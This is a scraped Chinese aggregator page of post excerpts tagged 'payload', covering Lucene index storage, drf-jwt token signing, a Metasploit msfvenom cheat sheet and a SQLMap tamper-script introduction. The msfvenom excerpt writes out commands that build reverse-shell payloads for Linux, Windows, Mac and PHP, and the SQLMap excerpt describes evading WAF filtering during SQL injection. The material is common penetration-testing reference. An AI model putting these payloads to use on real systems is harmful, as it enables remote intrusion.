payload

谈谈lucene倒排索引的存储方式(一)

这一生的挚爱 提交于 2019-12-02 07:48:39
lucene的倒排索引存储包括词的索引数据存储、词的位置存储以及写入过程,这3个部分是比较复杂的准备分开描述,先谈谈位置的存储方式: 词的位置具体包括每篇文档中的词频、位置以及附带的payload(这里先忽略掉norm信息的存储),这3块lucene分别采用了3个输出流进行写入,具体写入过程如下: 1、对于每个词而言会记录该次所属的文档ID以及在该文档中的词频,由于文档ID已经排过序所以写入时会进行差值压缩存储,而文档词频会直接存储,并且每128条记录进行分块压缩存储; 2、令Doc=abc|123;bcd;def,每写完所属文档ID以及词频,就会写入该词在文档中的每个位置(指文档经过分词后的第n个词(分号为词的分隔符 def为第3个词 ))、起始和结束的偏移量( 指文档未分词时的开始和结束位置(bcd的开始和结束位置分别为8和11),通过偏移量可以算出词、payload以及payload分隔符的总长度,所以这个长度不要认为是词的长度和payload的长度(123为payload,对于abc的开始和结束位置分别为0和7) )、每个词附带的payload信息。由于位置信息、偏移量已经排过序所以会按照差值压缩存储。位置信息会按照128条记录分块压缩存储到单独的文件中

jwt token认证

夙愿已清 提交于 2019-12-02 06:41:39
目录 1、drf-jwt手动签发与校验 2、drf小组件:过滤、筛选、排序、分页 => 针对与群查接口 jwt_token源码分析(入口) 签发token源码分析 校验token源码分析 手动签发token 签发源码小总结: 手动校验token 校验源码小总结 1、drf-jwt手动签发与校验 2、drf小组件:过滤、筛选、排序、分页 => 针对与群查接口 jwt_token源码分析(入口) rest_framework_jwt --> views.py --> ObtainJSONWebToken(JSONWebTokenAPIView) class ObtainJSONWebToken(JSONWebTokenAPIView): serializer_class = JSONWebTokenSerializer 然后到父类中JSONWebTokenAPIView的post方法 def post(self, request, *args, **kwargs): #从get_serializer获取serializer serializer = self.get_serializer(data=request.data) ........ 点击get_serializer def get_serializer(self, *args, **kwargs):

msf下的各种生成payload命令

≯℡__Kan透↙ 提交于 2019-12-02 06:18:46
msf下的各种生成payload命令 List payloads msfvenom -l Binaries: Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho Web Payloads PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php

jwt认证

不羁的心 提交于 2019-12-02 05:44:58
drf-jwt插件 官网 https://github.com/jpadilla/django-rest-framework-jwt 安装 >: pip3 install djangorestframework-jwt 登录 - 签发token:api/urls.py # ObtainJSONWebToken视图类就是通过username和password得到user对象然后签发token from rest_framework_jwt.views import ObtainJSONWebToken, obtain_jwt_token urlpatterns = [ # url(r'^jogin/$', ObtainJSONWebToken.as_view()), url(r'^jogin/$', obtain_jwt_token), ] 认证 - 校验token:全局或局部配置drf-jwt的认证类 JSONWebTokenAuthentication from rest_framework.views import APIView from utils.response import APIResponse # 必须登录后才能访问 - 通过了认证权限组件 from rest_framework.permissions import IsAuthenticated from

drf-jwt手动签发与校验

喜欢而已 提交于 2019-12-02 05:34:16
一、签发token 1.源码入口 # 前提:给一个局部禁用了所有 认证与权限 的视图类发送用户信息得到token,其实就是登录接口 # 1)rest_framework_jwt.views.ObtainJSONWebToken 的 父类 JSONWebTokenAPIView 的 post 方法 # 接受有username、password的post请求 # 2)post方法将请求数据交给 rest_framework_jwt.serializer.JSONWebTokenSerializer 处理 # 完成数据的校验,会走序列化类的 全局钩子校验规则,校验得到登录用户并签发token存储在序列化对象中 2.核心源码:rest_framework_jwt.serializer.JSONWebTokenSerializer的validate(self, attrs)方法 def validate(self, attrs): # 账号密码字典 credentials = { self.username_field: attrs.get(self.username_field), 'password': attrs.get('password') } if all(credentials.values()): # 签发token第1步:用账号密码得到user对象 user =

Azure AD JWT token: how to see through which client secret it was granted

一曲冷凌霜 提交于 2019-12-02 04:31:51
I have an Azure AD application and have generated two client secrets. I can get a JWT access token using each secret (via client_credentials grant) but can I also see from the JWT token via which client secret it was requested? If I inspect the JWT tokens I get back, some payload fields are always the same ( aud , iss , etc) and some are always different ( iat , nbf , aio , etc) but there is no info as far as I can tell that identifies the client secret that was used. Here's an example payload: { "aud": "https://graph.microsoft.com", "iss": "https://sts.windows.net/e402c5fb-58e9-48c3-b567

drf框架day8

陌路散爱 提交于 2019-12-02 03:43:32
1.签发token源码分析 2.校验token源码分析 3.自定义drf-jwt配置 4.多方式登录签发token 5.自定义jwt校验规则(了解) 6.admin密文管理自定义User表(了解) 7.群查各过滤组件数据准备 8.drf搜索组件 9.drf排序组件 10.基础分页器 一.签发token源码分析 源码入口: 前提:给一个局部禁用了所有 认证与权限 的视图类发送用户信息得到token,其实就是登陆接口 1.rest_framework_jwt.views.ObtainJSONWebToken 的 父类 JSONWebTokenAPIView 的 post 方法 # 接受有username,password的post请求 2.post方法将请求数据交给rest_framework_jwt.serializer.JSONWebToKenSerializer 处理 # 完成数据的校验,会走序列化类的 全局钩子校验规则,校验得到登陆用户并签发,token存储在序列化对象中 核心源码:rest_framework_jwt.serializer.JSONWebTokenSerializer的validate(self, attrs)方法 def validate(self, attrs): # 账号密码字典 credentials = { self.username_field:

SQLMap中tamper的简介

流过昼夜 提交于 2019-12-02 03:36:30
目录结构 一、SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二、适配不同数据库类型的测试tamper 三、SQLMap中tamper篡改脚本的功能解释 一、SQLMap中tamper的简介 1.tamper的作用 使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。 部分防护系统的缩写: WAF:Web应用程序防火墙,Web Application Firewall IPS:入侵防御系统, Intrusion Prevention System IDS:入侵检测系统,Intrusion Detection System 2.tamper用法 --tamper=TAMPER 利用给定的脚本进行篡改注入数据。其用法可举例说明: python sqlmap.py -u "http://.../?uname=admin&pwd=pass123" --level=5 --risk=3 -p "uname" --tamper=xxx.py 表示对指定的url地址,以所设置的level等级、risk等级,并采用选定的tamper篡改脚本对参数“uname”进行检测 二、适配不同数据库类型的测试tamper 当使用SQLMap篡改脚本执行渗透测试时,面对众多tamper可能会比较困惑

10.23总结

↘锁芯ラ 提交于 2019-12-02 03:35:20
签发token 源码入口 前提:给一个局部禁用了所有 认证与权限 的视图类发送用户信息得到token,其实就是登录接口 1.rest_framework_jwt.views.ObtainJSONWebToken 的 父类 JSONWebTokenAPIView 的 post 方法   接收有username、password的post请求 2.post方法将请求数据交给 rest_framework_jwt.serializer.JSONWebTokenSerializer 处理   完成数据的校验,会走序列化类的 全局钩子校验规则,校验得到登录用户并签发token存储在序列化对象中 核心源码:rest_framework_jwt.serializer.JSONWebTokenSerializer的validate(self, attrs)方法 def validate(self, attrs): # 账号密码字典 credentials = { self.username_field: attrs.get(self.username_field), 'password': attrs.get('password') } if all(credentials.values()): # 签发token第一步:用账号密码得到user对象 user = authenticate(*

JWT自定义校验规则与生成、用户多种方式登陆、搜索过滤,排序,分页

守給你的承諾、 提交于 2019-12-02 03:35:00
# 自定义校验token规则1.视图类 from .authentications import JWTAuthentication class UserDetail1(APIView): permission_classes = [IsAuthenticated] # 必须登录 authentication_classes = [JWTAuthentication] # jwt用户token自定义登陆认证规则 def get(self, request, *args, **kwargs): return APIResponse(results={'username': request.user.username}) 2.自定义token规则,在api生成一个authentications.py认证文件 import jwt from rest_framework_jwt.authentication import BaseJSONWebTokenAuthentication from rest_framework_jwt.authentication import jwt_decode_handler from rest_framework.exceptions import AuthenticationFailed class JWTAuthentication